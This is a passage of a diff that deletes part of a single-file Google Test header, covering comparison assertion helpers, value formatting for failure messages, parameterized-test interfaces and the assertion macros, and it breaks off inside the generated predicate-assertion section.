-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Adds a TestProperty to the current TestResult object when invoked from
-  // inside a test, to current TestCase's ad_hoc_test_result_ when invoked
-  // from SetUpTestCase or TearDownTestCase, or to the global property set
-  // when invoked elsewhere.  If the result already contains a property with
-  // the same key, the value will be updated.
-  void RecordProperty(const std::string& key, const std::string& value);
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  TestCase* GetMutableTestCase(int i);
-
-  // Accessors for the implementation object.
-  internal::UnitTestImpl* impl() { return impl_; }
-  const internal::UnitTestImpl* impl() const { return impl_; }
-
-  // These classes and funcions are friends as they need to access private
-  // members of UnitTest.
-  friend class Test;
-  friend class internal::AssertHelper;
-  friend class internal::ScopedTrace;
-  friend class internal::StreamingListenerTest;
-  friend class internal::UnitTestRecordPropertyTestHelper;
-  friend Environment* AddGlobalTestEnvironment(Environment* env);
-  friend internal::UnitTestImpl* internal::GetUnitTestImpl();
-  friend void internal::ReportFailureInUnknownLocation(
-      TestPartResult::Type result_type,
-      const std::string& message);
-
-  // Creates an empty UnitTest.
-  UnitTest();
-
-  // D'tor
-  virtual ~UnitTest();
-
-  // Pushes a trace defined by SCOPED_TRACE() on to the per-thread
-  // Google Test trace stack.
-  void PushGTestTrace(const internal::TraceInfo& trace)
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Pops a trace from the per-thread Google Test trace stack.
-  void PopGTestTrace()
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Protects mutable state in *impl_.  This is mutable as some const
-  // methods need to lock it too.
-  mutable internal::Mutex mutex_;
-
-  // Opaque implementation object.  This field is never changed once
-  // the object is constructed.  We don't mark it as const here, as
-  // doing so will cause a warning in the constructor of UnitTest.
-  // Mutable state in *impl_ is protected by mutex_.
-  internal::UnitTestImpl* impl_;
-
-  // We disallow copying UnitTest.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(UnitTest);
-};
-
-// A convenient wrapper for adding an environment for the test
-// program.
-//
-// You should call this before RUN_ALL_TESTS() is called, probably in
-// main().  If you use gtest_main, you need to call this before main()
-// starts for it to take effect.  For example, you can define a global
-// variable like this:
-//
-//   testing::Environment* const foo_env =
-//       testing::AddGlobalTestEnvironment(new FooEnvironment);
-//
-// However, we strongly recommend you to write your own main() and
-// call AddGlobalTestEnvironment() there, as relying on initialization
-// of global variables makes the code harder to read and may cause
-// problems when you register multiple environments from different
-// translation units and the environments have dependencies among them
-// (remember that the compiler doesn't guarantee the order in which
-// global variables from different translation units are initialized).
-inline Environment* AddGlobalTestEnvironment(Environment* env) {
-  return UnitTest::GetInstance()->AddEnvironment(env);
-}
-
-// Initializes Google Test.  This must be called before calling
-// RUN_ALL_TESTS().  In particular, it parses a command line for the
-// flags that Google Test recognizes.  Whenever a Google Test flag is
-// seen, it is removed from argv, and *argc is decremented.
-//
-// No value is returned.  Instead, the Google Test flag variables are
-// updated.
-//
-// Calling the function for the second time has no user-visible effect.
-GTEST_API_ void InitGoogleTest(int* argc, char** argv);
-
-// This overloaded version can be used in Windows programs compiled in
-// UNICODE mode.
-GTEST_API_ void InitGoogleTest(int* argc, wchar_t** argv);
-
-namespace internal {
-
-// FormatForComparison<ToPrint, OtherOperand>::Format(value) formats a
-// value of type ToPrint that is an operand of a comparison assertion
-// (e.g. ASSERT_EQ).  OtherOperand is the type of the other operand in
-// the comparison, and is used to help determine the best way to
-// format the value.  In particular, when the value is a C string
-// (char pointer) and the other operand is an STL string object, we
-// want to format the C string as a string, since we know it is
-// compared by value with the string object.  If the value is a char
-// pointer but the other operand is not an STL string object, we don't
-// know whether the pointer is supposed to point to a NUL-terminated
-// string, and thus want to print it as a pointer to be safe.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-
-// The default case.
-template <typename ToPrint, typename OtherOperand>
-class FormatForComparison {
- public:
-  static ::std::string Format(const ToPrint& value) {
-    return ::testing::PrintToString(value);
-  }
-};
-
-// Array.
-template <typename ToPrint, size_t N, typename OtherOperand>
-class FormatForComparison<ToPrint[N], OtherOperand> {
- public:
-  static ::std::string Format(const ToPrint* value) {
-    return FormatForComparison<const ToPrint*, OtherOperand>::Format(value);
-  }
-};
-
-// By default, print C string as pointers to be safe, as we don't know
-// whether they actually point to a NUL-terminated string.
-
-#define GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(CharType)                \
-  template <typename OtherOperand>                                      \
-  class FormatForComparison<CharType*, OtherOperand> {                  \
-   public:                                                              \
-    static ::std::string Format(CharType* value) {                      \
-      return ::testing::PrintToString(static_cast<const void*>(value)); \
-    }                                                                   \
-  }
-
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(char);
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(const char);
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(wchar_t);
-GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_(const wchar_t);
-
-#undef GTEST_IMPL_FORMAT_C_STRING_AS_POINTER_
-
-// If a C string is compared with an STL string object, we know it's meant
-// to point to a NUL-terminated string, and thus can print it as a string.
-
-#define GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(CharType, OtherStringType) \
-  template <>                                                           \
-  class FormatForComparison<CharType*, OtherStringType> {               \
-   public:                                                              \
-    static ::std::string Format(CharType* value) {                      \
-      return ::testing::PrintToString(value);                           \
-    }                                                                   \
-  }
-
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(char, ::std::string);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const char, ::std::string);
-
-#if GTEST_HAS_GLOBAL_STRING
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(char, ::string);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const char, ::string);
-#endif
-
-#if GTEST_HAS_GLOBAL_WSTRING
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(wchar_t, ::wstring);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const wchar_t, ::wstring);
-#endif
-
-#if GTEST_HAS_STD_WSTRING
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(wchar_t, ::std::wstring);
-GTEST_IMPL_FORMAT_C_STRING_AS_STRING_(const wchar_t, ::std::wstring);
-#endif
-
-#undef GTEST_IMPL_FORMAT_C_STRING_AS_STRING_
-
-// Formats a comparison assertion (e.g. ASSERT_EQ, EXPECT_LT, and etc)
-// operand to be used in a failure message.  The type (but not value)
-// of the other operand may affect the format.  This allows us to
-// print a char* as a raw pointer when it is compared against another
-// char* or void*, and print it as a C string when it is compared
-// against an std::string object, for example.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-template <typename T1, typename T2>
-std::string FormatForComparisonFailureMessage(
-    const T1& value, const T2& /* other_operand */) {
-  return FormatForComparison<T1, T2>::Format(value);
-}
-
-// Separate the error generating code from the code path to reduce the stack
-// frame size of CmpHelperEQ. This helps reduce the overhead of some sanitizers
-// when calling EXPECT_* in a tight loop.
-template <typename T1, typename T2>
-AssertionResult CmpHelperEQFailure(const char* expected_expression,
-                                   const char* actual_expression,
-                                   const T1& expected, const T2& actual) {
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   FormatForComparisonFailureMessage(expected, actual),
-                   FormatForComparisonFailureMessage(actual, expected),
-                   false);
-}
-
-// The helper function for {ASSERT|EXPECT}_EQ.
-template <typename T1, typename T2>
-AssertionResult CmpHelperEQ(const char* expected_expression,
-                            const char* actual_expression,
-                            const T1& expected,
-                            const T2& actual) {
-GTEST_DISABLE_MSC_WARNINGS_PUSH_(4389 /* signed/unsigned mismatch */)
-  if (expected == actual) {
-    return AssertionSuccess();
-  }
-GTEST_DISABLE_MSC_WARNINGS_POP_()
-
-  return CmpHelperEQFailure(expected_expression, actual_expression, expected,
-                            actual);
-}
-
-// With this overloaded version, we allow anonymous enums to be used
-// in {ASSERT|EXPECT}_EQ when compiled with gcc 4, as anonymous enums
-// can be implicitly cast to BiggestInt.
-GTEST_API_ AssertionResult CmpHelperEQ(const char* expected_expression,
-                                       const char* actual_expression,
-                                       BiggestInt expected,
-                                       BiggestInt actual);
-
-// The helper class for {ASSERT|EXPECT}_EQ.  The template argument
-// lhs_is_null_literal is true iff the first argument to ASSERT_EQ()
-// is a null pointer literal.  The following default implementation is
-// for lhs_is_null_literal being false.
-template <bool lhs_is_null_literal>
-class EqHelper {
- public:
-  // This templatized version is for the general case.
-  template <typename T1, typename T2>
-  static AssertionResult Compare(const char* expected_expression,
-                                 const char* actual_expression,
-                                 const T1& expected,
-                                 const T2& actual) {
-    return CmpHelperEQ(expected_expression, actual_expression, expected,
-                       actual);
-  }
-
-  // With this overloaded version, we allow anonymous enums to be used
-  // in {ASSERT|EXPECT}_EQ when compiled with gcc 4, as anonymous
-  // enums can be implicitly cast to BiggestInt.
-  //
-  // Even though its body looks the same as the above version, we
-  // cannot merge the two, as it will make anonymous enums unhappy.
-  static AssertionResult Compare(const char* expected_expression,
-                                 const char* actual_expression,
-                                 BiggestInt expected,
-                                 BiggestInt actual) {
-    return CmpHelperEQ(expected_expression, actual_expression, expected,
-                       actual);
-  }
-};
-
-// This specialization is used when the first argument to ASSERT_EQ()
-// is a null pointer literal, like NULL, false, or 0.
-template <>
-class EqHelper<true> {
- public:
-  // We define two overloaded versions of Compare().  The first
-  // version will be picked when the second argument to ASSERT_EQ() is
-  // NOT a pointer, e.g. ASSERT_EQ(0, AnIntFunction()) or
-  // EXPECT_EQ(false, a_bool).
-  template <typename T1, typename T2>
-  static AssertionResult Compare(
-      const char* expected_expression,
-      const char* actual_expression,
-      const T1& expected,
-      const T2& actual,
-      // The following line prevents this overload from being considered if T2
-      // is not a pointer type.  We need this because ASSERT_EQ(NULL, my_ptr)
-      // expands to Compare("", "", NULL, my_ptr), which requires a conversion
-      // to match the Secret* in the other overload, which would otherwise make
-      // this template match better.
-      typename EnableIf<!is_pointer<T2>::value>::type* = 0) {
-    return CmpHelperEQ(expected_expression, actual_expression, expected,
-                       actual);
-  }
-
-  // This version will be picked when the second argument to ASSERT_EQ() is a
-  // pointer, e.g. ASSERT_EQ(NULL, a_pointer).
-  template <typename T>
-  static AssertionResult Compare(
-      const char* expected_expression,
-      const char* actual_expression,
-      // We used to have a second template parameter instead of Secret*.  That
-      // template parameter would deduce to 'long', making this a better match
-      // than the first overload even without the first overload's EnableIf.
-      // Unfortunately, gcc with -Wconversion-null warns when "passing NULL to
-      // non-pointer argument" (even a deduced integral argument), so the old
-      // implementation caused warnings in user code.
-      Secret* /* expected (NULL) */,
-      T* actual) {
-    // We already know that 'expected' is a null pointer.
-    return CmpHelperEQ(expected_expression, actual_expression,
-                       static_cast<T*>(NULL), actual);
-  }
-};
-
-// Separate the error generating code from the code path to reduce the stack
-// frame size of CmpHelperOP. This helps reduce the overhead of some sanitizers
-// when calling EXPECT_OP in a tight loop.
-template <typename T1, typename T2>
-AssertionResult CmpHelperOpFailure(const char* expr1, const char* expr2,
-                                   const T1& val1, const T2& val2,
-                                   const char* op) {
-  return AssertionFailure()
-         << "Expected: (" << expr1 << ") " << op << " (" << expr2
-         << "), actual: " << FormatForComparisonFailureMessage(val1, val2)
-         << " vs " << FormatForComparisonFailureMessage(val2, val1);
-}
-
-// A macro for implementing the helper functions needed to implement
-// ASSERT_?? and EXPECT_??.  It is here just to avoid copy-and-paste
-// of similar code.
-//
-// For each templatized helper function, we also define an overloaded
-// version for BiggestInt in order to reduce code bloat and allow
-// anonymous enums to be used with {ASSERT|EXPECT}_?? when compiled
-// with gcc 4.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-
-#define GTEST_IMPL_CMP_HELPER_(op_name, op)\
-template <typename T1, typename T2>\
-AssertionResult CmpHelper##op_name(const char* expr1, const char* expr2, \
-                                   const T1& val1, const T2& val2) {\
-  if (val1 op val2) {\
-    return AssertionSuccess();\
-  } else {\
-    return CmpHelperOpFailure(expr1, expr2, val1, val2, #op);\
-  }\
-}\
-GTEST_API_ AssertionResult CmpHelper##op_name(\
-    const char* expr1, const char* expr2, BiggestInt val1, BiggestInt val2)
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-
-// Implements the helper function for {ASSERT|EXPECT}_NE
-GTEST_IMPL_CMP_HELPER_(NE, !=);
-// Implements the helper function for {ASSERT|EXPECT}_LE
-GTEST_IMPL_CMP_HELPER_(LE, <=);
-// Implements the helper function for {ASSERT|EXPECT}_LT
-GTEST_IMPL_CMP_HELPER_(LT, <);
-// Implements the helper function for {ASSERT|EXPECT}_GE
-GTEST_IMPL_CMP_HELPER_(GE, >=);
-// Implements the helper function for {ASSERT|EXPECT}_GT
-GTEST_IMPL_CMP_HELPER_(GT, >);
-
-#undef GTEST_IMPL_CMP_HELPER_
-
-// The helper function for {ASSERT|EXPECT}_STREQ.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                                          const char* actual_expression,
-                                          const char* expected,
-                                          const char* actual);
-
-// The helper function for {ASSERT|EXPECT}_STRCASEEQ.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRCASEEQ(const char* expected_expression,
-                                              const char* actual_expression,
-                                              const char* expected,
-                                              const char* actual);
-
-// The helper function for {ASSERT|EXPECT}_STRNE.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                                          const char* s2_expression,
-                                          const char* s1,
-                                          const char* s2);
-
-// The helper function for {ASSERT|EXPECT}_STRCASENE.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRCASENE(const char* s1_expression,
-                                              const char* s2_expression,
-                                              const char* s1,
-                                              const char* s2);
-
-
-// Helper function for *_STREQ on wide strings.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTREQ(const char* expected_expression,
-                                          const char* actual_expression,
-                                          const wchar_t* expected,
-                                          const wchar_t* actual);
-
-// Helper function for *_STRNE on wide strings.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult CmpHelperSTRNE(const char* s1_expression,
-                                          const char* s2_expression,
-                                          const wchar_t* s1,
-                                          const wchar_t* s2);
-
-}  // namespace internal
-
-// IsSubstring() and IsNotSubstring() are intended to be used as the
-// first argument to {EXPECT,ASSERT}_PRED_FORMAT2(), not by
-// themselves.  They check whether needle is a substring of haystack
-// (NULL is considered a substring of itself only), and return an
-// appropriate error message when they fail.
-//
-// The {needle,haystack}_expr arguments are the stringified
-// expressions that generated the two real arguments.
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack);
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const char* needle, const char* haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const wchar_t* needle, const wchar_t* haystack);
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::string& needle, const ::std::string& haystack);
-
-#if GTEST_HAS_STD_WSTRING
-GTEST_API_ AssertionResult IsSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack);
-GTEST_API_ AssertionResult IsNotSubstring(
-    const char* needle_expr, const char* haystack_expr,
-    const ::std::wstring& needle, const ::std::wstring& haystack);
-#endif  // GTEST_HAS_STD_WSTRING
-
-namespace internal {
-
-// Helper template function for comparing floating-points.
-//
-// Template parameter:
-//
-//   RawType: the raw floating-point type (either float or double)
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-template <typename RawType>
-AssertionResult CmpHelperFloatingPointEQ(const char* expected_expression,
-                                         const char* actual_expression,
-                                         RawType expected,
-                                         RawType actual) {
-  const FloatingPoint<RawType> lhs(expected), rhs(actual);
-
-  if (lhs.AlmostEquals(rhs)) {
-    return AssertionSuccess();
-  }
-
-  ::std::stringstream expected_ss;
-  expected_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-              << expected;
-
-  ::std::stringstream actual_ss;
-  actual_ss << std::setprecision(std::numeric_limits<RawType>::digits10 + 2)
-            << actual;
-
-  return EqFailure(expected_expression,
-                   actual_expression,
-                   StringStreamToString(&expected_ss),
-                   StringStreamToString(&actual_ss),
-                   false);
-}
-
-// Helper function for implementing ASSERT_NEAR.
-//
-// INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-GTEST_API_ AssertionResult DoubleNearPredFormat(const char* expr1,
-                                                const char* expr2,
-                                                const char* abs_error_expr,
-                                                double val1,
-                                                double val2,
-                                                double abs_error);
-
-// INTERNAL IMPLEMENTATION - DO NOT USE IN USER CODE.
-// A class that enables one to stream messages to assertion macros
-class GTEST_API_ AssertHelper {
- public:
-  // Constructor.
-  AssertHelper(TestPartResult::Type type,
-               const char* file,
-               int line,
-               const char* message);
-  ~AssertHelper();
-
-  // Message assignment is a semantic trick to enable assertion
-  // streaming; see the GTEST_MESSAGE_ macro below.
-  void operator=(const Message& message) const;
-
- private:
-  // We put our data in a struct so that the size of the AssertHelper class can
-  // be as small as possible.  This is important because gcc is incapable of
-  // re-using stack space even for temporary variables, so every EXPECT_EQ
-  // reserves stack space for another AssertHelper.
-  struct AssertHelperData {
-    AssertHelperData(TestPartResult::Type t,
-                     const char* srcfile,
-                     int line_num,
-                     const char* msg)
-        : type(t), file(srcfile), line(line_num), message(msg) { }
-
-    TestPartResult::Type const type;
-    const char* const file;
-    int const line;
-    std::string const message;
-
-   private:
-    GTEST_DISALLOW_COPY_AND_ASSIGN_(AssertHelperData);
-  };
-
-  AssertHelperData* const data_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(AssertHelper);
-};
-
-}  // namespace internal
-
-#if GTEST_HAS_PARAM_TEST
-// The pure interface class that all value-parameterized tests inherit from.
-// A value-parameterized class must inherit from both ::testing::Test and
-// ::testing::WithParamInterface. In most cases that just means inheriting
-// from ::testing::TestWithParam, but more complicated test hierarchies
-// may need to inherit from Test and WithParamInterface at different levels.
-//
-// This interface has support for accessing the test parameter value via
-// the GetParam() method.
-//
-// Use it with one of the parameter generator defining functions, like Range(),
-// Values(), ValuesIn(), Bool(), and Combine().
-//
-// class FooTest : public ::testing::TestWithParam<int> {
-//  protected:
-//   FooTest() {
-//     // Can use GetParam() here.
-//   }
-//   virtual ~FooTest() {
-//     // Can use GetParam() here.
-//   }
-//   virtual void SetUp() {
-//     // Can use GetParam() here.
-//   }
-//   virtual void TearDown {
-//     // Can use GetParam() here.
-//   }
-// };
-// TEST_P(FooTest, DoesBar) {
-//   // Can use GetParam() method here.
-//   Foo foo;
-//   ASSERT_TRUE(foo.DoesBar(GetParam()));
-// }
-// INSTANTIATE_TEST_CASE_P(OneToTenRange, FooTest, ::testing::Range(1, 10));
-
-template <typename T>
-class WithParamInterface {
- public:
-  typedef T ParamType;
-  virtual ~WithParamInterface() {}
-
-  // The current parameter value. Is also available in the test fixture's
-  // constructor. This member function is non-static, even though it only
-  // references static data, to reduce the opportunity for incorrect uses
-  // like writing 'WithParamInterface<bool>::GetParam()' for a test that
-  // uses a fixture whose parameter type is int.
-  const ParamType& GetParam() const {
-    GTEST_CHECK_(parameter_ != NULL)
-        << "GetParam() can only be called inside a value-parameterized test "
-        << "-- did you intend to write TEST_P instead of TEST_F?";
-    return *parameter_;
-  }
-
- private:
-  // Sets parameter value. The caller is responsible for making sure the value
-  // remains alive and unchanged throughout the current test.
-  static void SetParam(const ParamType* parameter) {
-    parameter_ = parameter;
-  }
-
-  // Static value used for accessing parameter during a test lifetime.
-  static const ParamType* parameter_;
-
-  // TestClass must be a subclass of WithParamInterface<T> and Test.
-  template <class TestClass> friend class internal::ParameterizedTestFactory;
-};
-
-template <typename T>
-const T* WithParamInterface<T>::parameter_ = NULL;
-
-// Most value-parameterized classes can ignore the existence of
-// WithParamInterface, and can just inherit from ::testing::TestWithParam.
-
-template <typename T>
-class TestWithParam : public Test, public WithParamInterface<T> {
-};
-
-#endif  // GTEST_HAS_PARAM_TEST
-
-// Macros for indicating success/failure in test code.
-
-// ADD_FAILURE unconditionally adds a failure to the current test.
-// SUCCEED generates a success - it doesn't automatically make the
-// current test successful, as a test is only successful when it has
-// no failure.
-//
-// EXPECT_* verifies that a certain condition is satisfied.  If not,
-// it behaves like ADD_FAILURE.  In particular:
-//
-//   EXPECT_TRUE  verifies that a Boolean condition is true.
-//   EXPECT_FALSE verifies that a Boolean condition is false.
-//
-// FAIL and ASSERT_* are similar to ADD_FAILURE and EXPECT_*, except
-// that they will also abort the current function on failure.  People
-// usually want the fail-fast behavior of FAIL and ASSERT_*, but those
-// writing data-driven tests often find themselves using ADD_FAILURE
-// and EXPECT_* more.
-
-// Generates a nonfatal failure with a generic message.
-#define ADD_FAILURE() GTEST_NONFATAL_FAILURE_("Failed")
-
-// Generates a nonfatal failure at the given source file location with
-// a generic message.
-#define ADD_FAILURE_AT(file, line) \
-  GTEST_MESSAGE_AT_(file, line, "Failed", \
-                    ::testing::TestPartResult::kNonFatalFailure)
-
-// Generates a fatal failure with a generic message.
-#define GTEST_FAIL() GTEST_FATAL_FAILURE_("Failed")
-
-// Define this macro to 1 to omit the definition of FAIL(), which is a
-// generic name and clashes with some other libraries.
-#if !GTEST_DONT_DEFINE_FAIL
-# define FAIL() GTEST_FAIL()
-#endif
-
-// Generates a success with a generic message.
-#define GTEST_SUCCEED() GTEST_SUCCESS_("Succeeded")
-
-// Define this macro to 1 to omit the definition of SUCCEED(), which
-// is a generic name and clashes with some other libraries.
-#if !GTEST_DONT_DEFINE_SUCCEED
-# define SUCCEED() GTEST_SUCCEED()
-#endif
-
-// Macros for testing exceptions.
-//
-//    * {ASSERT|EXPECT}_THROW(statement, expected_exception):
-//         Tests that the statement throws the expected exception.
-//    * {ASSERT|EXPECT}_NO_THROW(statement):
-//         Tests that the statement doesn't throw any exception.
-//    * {ASSERT|EXPECT}_ANY_THROW(statement):
-//         Tests that the statement throws an exception.
-
-#define EXPECT_THROW(statement, expected_exception) \
-  GTEST_TEST_THROW_(statement, expected_exception, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_NO_THROW(statement) \
-  GTEST_TEST_NO_THROW_(statement, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_ANY_THROW(statement) \
-  GTEST_TEST_ANY_THROW_(statement, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_THROW(statement, expected_exception) \
-  GTEST_TEST_THROW_(statement, expected_exception, GTEST_FATAL_FAILURE_)
-#define ASSERT_NO_THROW(statement) \
-  GTEST_TEST_NO_THROW_(statement, GTEST_FATAL_FAILURE_)
-#define ASSERT_ANY_THROW(statement) \
-  GTEST_TEST_ANY_THROW_(statement, GTEST_FATAL_FAILURE_)
-
-// Boolean assertions. Condition can be either a Boolean expression or an
-// AssertionResult. For more information on how to use AssertionResult with
-// these macros see comments on that class.
-#define EXPECT_TRUE(condition) \
-  GTEST_TEST_BOOLEAN_(condition, #condition, false, true, \
-                      GTEST_NONFATAL_FAILURE_)
-#define EXPECT_FALSE(condition) \
-  GTEST_TEST_BOOLEAN_(!(condition), #condition, true, false, \
-                      GTEST_NONFATAL_FAILURE_)
-#define ASSERT_TRUE(condition) \
-  GTEST_TEST_BOOLEAN_(condition, #condition, false, true, \
-                      GTEST_FATAL_FAILURE_)
-#define ASSERT_FALSE(condition) \
-  GTEST_TEST_BOOLEAN_(!(condition), #condition, true, false, \
-                      GTEST_FATAL_FAILURE_)
-
-// Includes the auto-generated header that implements a family of
-// generic predicate assertion macros.
-// Copyright 2006, Google Inc.
-// All rights reserved.
-//
-// Redistribution and use in source and binary forms, with or without
-// modification, are permitted provided that the following conditions are
-// met:
-//
-//     * Redistributions of source code must retain the above copyright
-// notice, this list of conditions and the following disclaimer.
-//     * Redistributions in binary form must reproduce the above
-// copyright notice, this list of conditions and the following disclaimer
-// in the documentation and/or other materials provided with the
-// distribution.
-//     * Neither the name of Google Inc. nor the names of its
-// contributors may be used to endorse or promote products derived from
-// this software without specific prior written permission.
-//
-// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
-// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
-// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
-// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
-// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
-// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
-// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
-// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
-// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
-// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
-// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
-
-// This file is AUTOMATICALLY GENERATED on 10/31/2011 by command
-// 'gen_gtest_pred_impl.py 5'.  DO NOT EDIT BY HAND!
-//
-// Implements a family of generic predicate assertion macros.
-
-#ifndef GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
-#define GTEST_INCLUDE_GTEST_GTEST_PRED_IMPL_H_
-
-// Makes sure this header is not included before gtest.h.
-#ifndef GTEST_INCLUDE_GTEST_GTEST_H_
-# error Do not include gtest_pred_impl.h directly.  Include gtest.h instead.
-#endif  // GTEST_INCLUDE_GTEST_GTEST_H_
-
-// This header implements a family of generic predicate assertion
-// macros:
-//
-//   ASSERT_PRED_FORMAT1(pred_format, v1)
-//   ASSERT_PRED_FORMAT2(pred_format, v1, v2)
-//   ...
-//
-// where pred_format is a function or functor that takes n (in the
-// case of ASSERT_PRED_FORMATn) values and their source expression
-// text, and returns a testing::AssertionResult.  See the definition
-// of ASSERT_EQ in gtest.h for an example.
-//
-// If you don't care about formatting, you can use the more
-// restrictive version:
-//
-//   ASSERT_PRED1(pred, v1)
-//   ASSERT_PRED2(pred, v1, v2)
-//   ...
-//
-// where pred is an n-ary function or functor that returns bool,
-// and the values v1, v2, ..., must support the << operator for
-// streaming to std::ostream.
-//
-// We also define the EXPECT_* variations.
-//
-// For now we only support predicates whose arity is at most 5.
-// Please email googletestframework@googlegroups.com if you need
-// support for higher arities.
-
-// GTEST_ASSERT_ is the basic statement to which all of the assertions
-// in this file reduce.  Don't use this in your code.
-
-#define GTEST_ASSERT_(expression, on_failure) \
-  GTEST_AMBIGUOUS_ELSE_BLOCKER_ \
-  if (const ::testing::AssertionResult gtest_ar = (expression)) \
-    ; \
-  else \
-    on_failure(gtest_ar.failure_message())
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED1.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1>
-AssertionResult AssertPred1Helper(const char* pred_text,
-                                  const char* e1,
-                                  Pred pred,
-                                  const T1& v1) {
-  if (pred(v1)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1;
-}
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED_FORMAT1.
-// Don't use this in your code.
-#define GTEST_PRED_FORMAT1_(pred_format, v1, on_failure)\
-  GTEST_ASSERT_(pred_format(#v1, v1), \
-                on_failure)
-
-// Internal macro for implementing {EXPECT|ASSERT}_PRED1.  Don't use
-// this in your code.
-#define GTEST_PRED1_(pred, v1, on_failure)\
-  GTEST_ASSERT_(::testing::AssertPred1Helper(#pred, \
-                                             #v1, \
-                                             pred, \
-                                             v1), on_failure)
-
-// Unary predicate assertion macros.
-#define EXPECT_PRED_FORMAT1(pred_format, v1) \
-  GTEST_PRED_FORMAT1_(pred_format, v1, GTEST_NONFATAL_FAILURE_)
-#define EXPECT_PRED1(pred, v1) \
-  GTEST_PRED1_(pred, v1, GTEST_NONFATAL_FAILURE_)
-#define ASSERT_PRED_FORMAT1(pred_format, v1) \
-  GTEST_PRED_FORMAT1_(pred_format, v1, GTEST_FATAL_FAILURE_)
-#define ASSERT_PRED1(pred, v1) \
-  GTEST_PRED1_(pred, v1, GTEST_FATAL_FAILURE_)
-
-
-
-// Helper function for implementing {EXPECT|ASSERT}_PRED2.  Don't use
-// this in your code.
-template <typename Pred,
-          typename T1,
-          typename T2>
-AssertionResult AssertPred2Helper(const char* pred_text,
-                                  const char* e1,
-                                  const char* e2,
-                                  Pred pred,
-                                  const T1& v1,
-                                  const T2& v2) {
-  if (pred(v1, v2)) return AssertionSuccess();
-
-  return AssertionFailure() << pred_text << "("
-                            << e1 << ", "
-                            << e2 << ") evaluates to false, where"
-                            << "\n" << e1 << " evaluates to " << v1
